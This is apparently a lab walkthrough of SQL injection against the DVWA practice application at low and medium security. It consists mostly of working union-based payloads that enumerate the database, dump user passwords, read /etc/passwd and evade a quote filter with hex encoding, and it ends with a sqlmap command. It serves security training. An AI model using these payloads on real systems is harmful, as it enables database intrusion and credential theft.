Security level = low
99 or 1=1
- will display all the records
99 or 1=1 union select 1,2,3
- will display "The used SELECT statements have a different number of columns" error message
99 or 1=1 union select 1,2
- no error message but display all records
99 or 1=1 union select null,null
- no error message but display all records
99 or 1=1 union select version(),database()
- will display the version of MySQL and the database name - dvwa
99 or 1=1 union select null, user()
or
99 or 1=1 union select user(), null
- will display the current user of the database
99 or 1=1 union select null, table_name from information_schema.tables
- will display all the table names
99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name='users'
- will display the users table column list
99 or 1=1 union select null, concat(first_name,0x0a,password) from users
- we are looking for users table's first_name and password
99 or 1=1 union select null,@@datadir
- will display the mysql directory
99 or 1=1 union all select null,load_file('/etc/passwd')
- will display the content of /etc/passwd
Security level = medium
99 or 1=1
- will display all the records
99 or 1=1 union select 1,2,3
- will display "The used SELECT statements have a different number of columns" error message
99 or 1=1 union select 1,2
- no error message but display all records
99 or 1=1 union select null,null
- no error message but display all records
99 or 1=1 union select version(),database()
- will display the version of MySQL and the database name - dvwa
99 or 1=1 union select null, user()
or
99 or 1=1 union select user(), null
- will display the current user of the database
99 or 1=1 union select null, table_name from information_schema.tables
- will display all the table names
99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns
- since where clause cannot be used, all column name should be listed
or
99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name=0x7573657273
- where 0x7573657273 is Hex value of "users"
99 or 1=1 union select null, concat(first_name,0x0a,password) from users
- we are looking for users table's first_name and password
99 or 1=1 union select null,@@datadir
- will display the mysql directory
sqlmap for Security = low
./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=rc1vt2hcper8nlpau9mh2v4304" --string="Surname" -T users --columns
For Security = medium is similar.
That's all! See you!